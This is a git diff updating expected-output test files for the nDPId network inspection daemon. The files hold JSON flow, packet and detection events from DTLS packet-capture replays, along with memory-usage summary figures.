00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1556606275913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1556606275913,"pkt":"AAAAp2BiAAAAtzPNCABFAAFoW6pAAD4RrzMKusaVI9I7hpmzrZsBVHbeFv7\/AAAAAAAAAAEBPwEAATMAAQAAAAABM\/79XLdFN6Sz4OQy2sCEjyxqziIlNS85zlQeFiYi19pl1vEAFGas+MFHIUbk58MIduuc4UCKEPlDAKDAMMAswCjAJMAUwAoApQCjAKEAnwBrAGoAaQBoADkAOAA3ADYAiACHAIYAhcAywC7AKsAmwA\/ABQCdAD0ANQCEwC\/AK8AnwCPAE8AJAKQAogCgAJ4AZwBAAD8APgAzADIAMQAwAJoAmQCYAJcARQBEAEMAQsAxwC3AKcAlwA7ABACcADwALwCWAEEAB8ASwAgAFgATABAADcANwAMACgD\/AQAAVQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} -01239{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1556606275726,"flow_last_seen":1556606276035,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":2104,"flow_avg_l4_payload_len":526,"midstream":0,"thread_ts_msec":1556606276035,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"d45798bc098cd930de7eb2f5f866e994","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01067{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1556606275726,"flow_last_seen":1556606278645,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":5138,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1556606278645,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +01239{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1556606275726,"flow_last_seen":1556606276035,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":2104,"flow_avg_l4_payload_len":526,"midstream":0,"thread_ts_msec":1556606276035,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"d45798bc098cd930de7eb2f5f866e994","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01067{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1556606275726,"flow_last_seen":1556606278645,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":5138,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1556606278645,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":5138,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1556606278645} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870067 bytes -~~ total memory freed........: 5870067 bytes -~~ total allocations/frees...: 118136/118136 +~~ total memory allocated....: 6003701 bytes +~~ total memory freed........: 6003701 bytes +~~ total allocations/frees...: 120898/120898 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 482 chars ~~ json string max len.......: 1244 chars diff --git a/test/results/dtls_mid_sessions.pcapng.out b/test/results/dtls_mid_sessions.pcapng.out new file mode 100644 index 000000000..bcb79e23e --- /dev/null +++ b/test/results/dtls_mid_sessions.pcapng.out @@ -0,0 +1,40 @@ +00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1644251732783} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732783,"flow_last_seen":1644251732783,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1644251732783,"l3_proto":"ip4","src_ip":"53.214.238.65","dst_ip":"199.186.151.155","src_port":53558,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1644251732783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1644251732783,"pkt":"AAAAAAAAAAUAH77DCABFAAB5TfQAAHkRcBI11u5Bx7qXm9E2AbsAZQC2FwEAAAEAAAAA1BUAUFbLHE7KkMRUAMa+BCcg\/DTD4cWbj4CR\/ou6\/eEj1qcEoJjrsJeHH7KwZMNGTwAG1rS\/\/iatJdFhJzn0FDJ0hSfdwvHN8cKVzNzbvFPCN5Gy"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732783,"flow_last_seen":1644251732783,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1644251732783,"l3_proto":"ip4","src_ip":"53.214.238.65","dst_ip":"199.186.151.155","src_port":53558,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732795,"flow_last_seen":1644251732795,"flow_idle_time":200000,"flow_min_l4_payload_len":378,"flow_max_l4_payload_len":378,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1644251732795,"l3_proto":"ip4","src_ip":"135.215.56.198","dst_ip":"124.73.140.89","src_port":443,"dst_port":61189,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1644251732795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1644251732795,"pkt":"AAAAAAAAAA0A4CzfCABFAAGW4ZIAAPMRG4SH1zjGfEmMWQG77wUBgjnKF\/79AAEAAAAMGs0BbbJE\/pYaT4dviGdRi2WOW3oR6c89g2R+B6cawD8bIDdGtNIdChofe7UWFvQsORIVWYmmB1ARH2\/YcAr2riegnyfmmD5WNzjlTxQKV6PsE39+eKr8boH2o8jfYvfY6pYtfswzpn9K6hafEVXA2FkG+xAviECcyUgulZBKj4E9uB5YFuX0y7TxSC60ET9QuiIYZ4UUay4t2BEEd5FC6C5uWNuKgCANMbDPWWDHNenOhqCQ0yF83uBqHq5r406ipnTN4XmSI+EDNc9u2FN1pMCLrm4dBrNrnCATji9ZfGECArYgjEqRBAyHOL2Vvc56w\/Qgv8pMx2l0H\/kzzxsaovLIADZ0nv90fLwWxgJh5LTsHegomfRJxO6vDkSmbGbpSLoc1i0NS6B5uEf0iwFQrPlN8SwGIkJI3yry5\/bY50nqmbGvAmRGRPr67RoYsMs3XyFBKaVKTGI+C7wl3+a9aZ7IG79al3N\/ir30CorciRns"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732795,"flow_last_seen":1644251732795,"flow_idle_time":200000,"flow_min_l4_payload_len":378,"flow_max_l4_payload_len":378,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1644251732795,"l3_proto":"ip4","src_ip":"135.215.56.198","dst_ip":"124.73.140.89","src_port":443,"dst_port":61189,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732819,"flow_last_seen":1644251732819,"flow_idle_time":200000,"flow_min_l4_payload_len":1243,"flow_max_l4_payload_len":1243,"flow_tot_l4_payload_len":1243,"flow_avg_l4_payload_len":1243,"midstream":0,"thread_ts_msec":1644251732819,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"121.152.255.238","src_port":443,"dst_port":8460,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1644251732819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1285,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1285,"pkt_l4_len":1251,"thread_ts_msec":1644251732819,"pkt":"AAAAAAAAAAwAL85GCABFAAT3jYAAAD8RW4Cql2nXeZj\/7gG7IQwE469EF\/79AAEAAAAOADMEzpBZfrcT0WIwMaDtBJeOBmxdcsJNOoXMZL6URfohbDk+fMmixVNI9xolr8+oLL1F4twNjv+WWISFzhnbON+quhvr\/URpD+ws1Hw5ypw9kryCC3Gz\/V0VjiX8Xc\/vtdTUbPgNhVWHd4bAhh40ADLhQPQkBAsCOtbK+iLtMag8MKHa7XNeUssDEU2YZ+LVLTSuMPPRFA7Bn70EZWs\/DCi27ASgPoWey+zwI1xIXuPrzL3CEE0ryC7xCVWmB7SiiwnTXaWTMiWuKckduKf2vcqeUInANsr5N7tIclBo8npD6Wv5TYmAETN2yU8Nm\/538q30IPqbVb+BDK3Mm8YWXVJwGjPmfJMeSqlurhbLk+lY8A7H5w4CNWa5sLnwiYR0t1nGGT+c6gH4t9io9FfDfRocu2Hs8MORtesCyko\/XlrpKkxc7dT+hoUQ2Ig6qEPXA3sYuuaHBk29mkEb0AQ5r3Yeoi2i9uz3LKLmrnRHrUK\/fmzNPiFJaxXPVKpQfGCdE0kEm5BCPbK9vfyBOOB3\/7sYIoj0zRw0ujkmi\/fms\/mWUCW\/DAq0p0bR5iVVH+Ngw2uqr6zQEm4XRGnGZFmuu0l0H6YD3Eb1B2UCW9vuErCQHHIww4lSfamNKn\/MNTatiSE9AEGAXFnsatbLq1Z5io9Y\/TdYF6+t1UHJOwZwD7b9V9i+mtPfgQLl8NiU2j0hMADfqqZO+d6StX4ZPzcJzKEOTgyaK0nvBKJhkOP0NgYPHYSdDxApEbupq0dKHpaNbacM2uKwu504erdoidcewH\/7L7YuIPeHxN8B2CxpNmSaolF2ih\/soS48V5\/y2G2vsTf20WLKhZOVAc2HAwSJWppTXIXZ2ymaI2ccqmtA+Jj1Sh\/aySJmCNJgQRb+Tcb4UAIe2s7Ss0ohk8dIJaV1VTOiYqi2PO\/cmF2fbWjn7YCBHVONNgmgwVurzrLR\/7LKD6+RtyeBaiIiRznG7koq5+WUC4s4lIhOAXYNXcFJlGpDczzjCsWhAucM29DaONa7p6yAmBSnUB\/yr6Ovdz\/0qrxF0A2mKqF9Fr8wa1k2+IVlWXdO5M8MrkylBlafgM+pBrC++fqAsB5Z8ntzGyEEAIhIguvUc7eEMfLb8ompiZN0LG\/UQFL8Hdeydye8KizDxkDbrTMl+gvHDUgxrwrHaNEfQLZEE9yOxjouCuzqHoOHaNLdHXriALPdgO8PgZg52Nl0rFNULXT9vXKUz77IS3AzkI0jn3jD4IUvZGga3YFZwaH\/U061fPLL4j+BBr50LUISnA80AXu8pkPA+ItEniZjyvqJbWwUiGDKodjVfcrlS0rEunQNIk1gZJIvR9OfRy2oQ+VN6aSshdDXKDEBImK+wljVdTA53XPi5\/MccimOI9bmxkLRSSaFifU8SwSGq79LgaobQpMdKTgkyZj4oryYIvGYLwbOQOlxuysPSmzwLQSgG62CyC9PDl93WjiS04EZ2I8t0QapYhEHiYvaC6XnL5vFE61pGN6LvAFh8VjcHdTgX+xBxR7SDTPMEMIjTHgXfKH7wy5Cg3nULpAYX6cJGMwlbrjXj8yi+MUAjhinxtvIPi08w3jd2aoqmwKJ16S\/lRU2isekmVfixMPHHoKAkMAhFQvyUcTC5r0kOs5hmQ=="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732819,"flow_last_seen":1644251732819,"flow_idle_time":200000,"flow_min_l4_payload_len":1243,"flow_max_l4_payload_len":1243,"flow_tot_l4_payload_len":1243,"flow_avg_l4_payload_len":1243,"midstream":0,"thread_ts_msec":1644251732819,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"121.152.255.238","src_port":443,"dst_port":8460,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1644251732824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1644251732824,"pkt":"AAAAAAAAAA0A4CzfCABFAADqm5gAAPMRYiqH1zjGfEmMWQG77wUA1gTeF\/79AAEAAAAMHEgAwbJE\/pYaT4jqSUPNYrxJL8Codo+NI1ON15wpo0UXGwutN5NqnUCtT4dyFWAwgXODy+FvALQSrXC5ZUWgnBdE5XT3NYf0YexgHZ5a2Idl8QW41Rj7Lf2MjzpVZcdBplQYlFQw8nR6sXhVOTnwn+aZxjvNjegLOT\/kssRbnCbEZBdFElSPioELBFUc51QWw1KkVU7sCAsrnomfJlGQXKgbAgDCxy96WQjMbwdI0DC9j1PjopVLRsWpCdrq61oMc+AXpbs="} +00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1644251732837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1644251732837,"pkt":"AAAAAAAAAA0A4CzfCABFAAGul4wAAPMRZXKH1zjGfEmMWQG77wUBmmGkF\/79AAEAAAAMHEsBhbJE\/pYaT4jtxwUFArtWMM0UapEkJqGElOoBLeIEH2dap\/HHoRfD+WZCZVeWcfs89omPS71pdPjHruF4M8hY0GDqFGaq4hwXSFhdKzQYz9O+XrC2R3kLNO+7d9ahfIZgOf3IzVC3go+4VnJWVPbutZawFrPDHu4OI2DkufkbgN2w2MdfyHY7tFIv3sv9Yec+tmHqp+TfY\/7K48nV\/SpID+BxX8vM1sjsa38xKBOp231zDMTPzXJ6BXVnEv38pt+e6QYodnl8j0\/\/iNXd\/0ygBx2Gbs+PMnBPhRl6mKflFEu+Rd1rHxB+cdW9TD5Zu0JuceAevKUzl8EhV8zP0uj8u2txE2Wy+x7Ur2Sf3iDsNtMEnmSFOBlZ4L0kTTNdryI+9vkWxgqkIpD+tTHrsbvnuosn8rINm4EEiwmOHxT5Txkfi0nQj3KhwBB\/CrnZUgKygw4AqCnOteFXYUOpGWPiW3ph5GOerUZvQJGtAXvFm9GNRbBLrfJbU+1TGc+0prjKcuXwKJXs"} +00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732859,"flow_last_seen":1644251732859,"flow_idle_time":200000,"flow_min_l4_payload_len":1453,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":1453,"flow_avg_l4_payload_len":1453,"midstream":0,"thread_ts_msec":1644251732859,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"72.102.179.218","src_port":443,"dst_port":62811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +02423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1644251732859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1495,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1495,"pkt_l4_len":1461,"thread_ts_msec":1644251732859,"pkt":"AAAAAAAAAAwAL85GCABFAAXJjqAAAD8R1tSql2nXSGaz2gG79VsFtfY\/F\/79AAEAAAAB\/fEFoF3h0hdGzu1TA0QyQd7pCFDSC3afBB7oBt63isvB1x36GJE6p5uYZLqeMCF8Kq0L9np57tsKxCxlUs+HEPNPgjqe\/5xfHnAfj07cLfClN5VTtTUB5qb\/Uzgw\/vvP21xao12ZqooD5yTV1LTW6vA7if2PeOLOISFIxtnk7K2YvqcYKSdlvHG6yR+nEkUYbU6TN2Si0w3F\/bXRIVZn\/utSvUrMMpJQJGoyc7+0D7gvTiD9elmM37eoGxMYN55aok\/Rqv5EzI9hLqHql4oyLrfR42TDTlKAkRrc8o4qI6IJa2LOra10lxuvJr\/k1kRymQi6OxdIBknFY9dxgj5ObzX8O8pZOayh3UP4Vz2Jf9AKuKYkDQt849LLzHcrz0KblbvSBh2+N16WkmUh4djf9UB8Gz1JDPiAayjCAJw5hmhil7+YLZ296spISGAB5r+u2tjzsifTOVhY7bN2UxxQL0fIlvoaWY\/y9\/ZCMN\/+nJC7y\/XaroqRUKCqLjMYIujedrY1z0fJdM0JfAxaURRtxuDg6RFwNJnO9cLRQvh2RBzs\/gEowITgrTOESBsB55ioZA+Tux2j7WJNEhcOrgqTxI1bbJVWgffituxrnfBek0e9qluQHI\/txOueYvkNqy+HmJuv6W9AqBW3FLdr3Vvac5XD4DcALe3OScCVumc+FhPk75xVgGSkCoI4G0TrOiDufPdLg8z2pt3BUcoLG3IOtO+HLK7pOSMmXHAtxLVvAmBgQRWFG2JQmfDm8onH1OYL8Iltb4x64j6qzL6hMWdqlw+a\/02Thb3V8PyMIouKtfvvmtMlyz08F\/FoFzYRF\/35lnpkyu7ILHtXf1gpl0BZFCjkiCrF80wOmxr34kk1Gh1nYmpvmR2c1gELo7egBTM4KmQu9zFJfddi1h5O5opVp2pZuvj7z0f+FQazcpP4K9W13C5doxhwqXYYRZUtt4pqSg7VuALKfHsI\/K4Nx5Pzjd8Iq83sBzE+Sij3K\/EOkb5S9OiJ5d4w\/8wChDtFtsZpbRqkgwtGZ4TnrZnmSWbnnYYmGLqkMVmQuWU3rujzIrOQB3K0aG7ROps9lH7HqkjO+xYl5kdVzAGlgBs4BUa5byQ9qr7+gASs2al+BeQGeNCk2lpX2dqMAWnlf9SFESF2PJ\/+D6wtsuLQNHWW98GDiQpZzl+TQEPv6M1IetlQnSEOrzTPvlVQ0qow\/isWdiWwy8jpT8kNltVS+TkyWuH33iJfs3osf1kc5j7VlJaSBFpBjStPiqCDgKjsbq+6tvZLCOrEhWktxUlyr4aS9FORJj6ifTHGiv9WaymbCyoyXZJIFaxmPOAb7c5uS\/0cFN3bjuM3H7QT7GWZlj6gyPR9zg4bGxlM97TWOC4d3ARcYsEBlv8VHv18CdgJohP47cPxOB9a+opIrMkOrhFGrrK44v+vTKioNn1c8+f9NCG8Fbxr5tdxL7fxVfgjuqbXOIBakcJUzdLWRNsAzRKgrPtIANoM9cxCLHkQD90heWs8wEJNR32F2du7L9Qj1wLSY255H+1dRBEN8sdZF3daSWc6HVfsiBsrKqYjNzYxgRW9EdxQnKRaUyEHb86zwYV+sCsCdtwBsST+orAadvLP+wODDjxGrp9hm5xmQsK0\/f+1q95HNtla\/h6LX2PUKlV9s\/xr32qoZMz5UYCZspfSbz\/g8qULof8RlfM8mCMFFROIBVYtfH3DfZvErVwl5dv6Ws2OhC7zPqb2i5xtt3COdOQq\/9wpconfg6RsNV4FfxrLV9+c1vSJ4BpssIk13lXRoHchuE7VyZo0yumolNBEM51qkcDI6ZUDyZOm4xRNlKZ4zHbJKFbfP6fXjB+0\/\/eyWSigKAUOj3m6IU\/DBl7etveDbav3int0J2aVp9BTKqRhvW7r4DdpbGP0lgAopZGSAdRjWrFa\/w=="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732859,"flow_last_seen":1644251732859,"flow_idle_time":200000,"flow_min_l4_payload_len":1453,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":1453,"flow_avg_l4_payload_len":1453,"midstream":0,"thread_ts_msec":1644251732859,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"72.102.179.218","src_port":443,"dst_port":62811,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1644251732895,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1644251732895,"pkt":"AAAAAAAAAA0A4CzfCABFAAB5eiMAAHURPVt5mP\/uqpdp1yEMAbsAZRo2F\/79AAEAAAAMhRMAUKWzGmfeg9vDd7\/B3T+kirAR7zq6Tf8oB5f1Qe4Uo6LIUlneZEoesMiQtJMzhmqS3RqJKvvRB2aCGmdCfvmL62icrVJNR6\/VZ+07XbOviqwQ"} +00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1644251732899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1644251732899,"pkt":"AAAAAAAAAA0A4CzfCABFAAEXWbEAAHsR1HVIZrPaqpdp1\/VbAbsBA4vCF\/79AAEAAAABzVAA7sDAOt7ZNYadwFH6SHccSVCdGOeDS5VAVNAWpaw7BhQgb+1bCi82Zlyb4VWcAVH\/n1elQ7THJB3xDUKy4xtskzMRGshyDl5w6kBiV+\/uymBxK+YhMTQUTq1HeBxB7zUOp+X+xuu7HM616iGjTAfQnnvrYWz\/HmxBxjmowsnmxGXDMK7PSSumdsoeyWUI738iBD4CXuuT0D1mQ3mFUW6\/Pk13ysfBe5VqGzIqxDG7bUTMvbDlBM25yv2N52iEk51XTxj0yy9gjACGD6yvi0albjjmw6qqv2ayTvP7YsK8J5EjIW\/WNb6g+p99LqUDPkA="} +00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1644251732904,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1644251732904,"pkt":"AAAAAAAAAAwAL85GCABFAAB5j\/YAAD8RXYiql2nXeZj\/7gG7IQwAZQo0F\/79AAEAAAAOADoAUJBZfrcT0WI3vKOvm48zQRKNwV9xk31D25d9i4LGPOZLsa\/MxEM\/iT8j5X2NeXzZcl7g81+pOvAYTMQ6CMg7uw6mEidESPz\/p+RCZ0ysmpq9"} 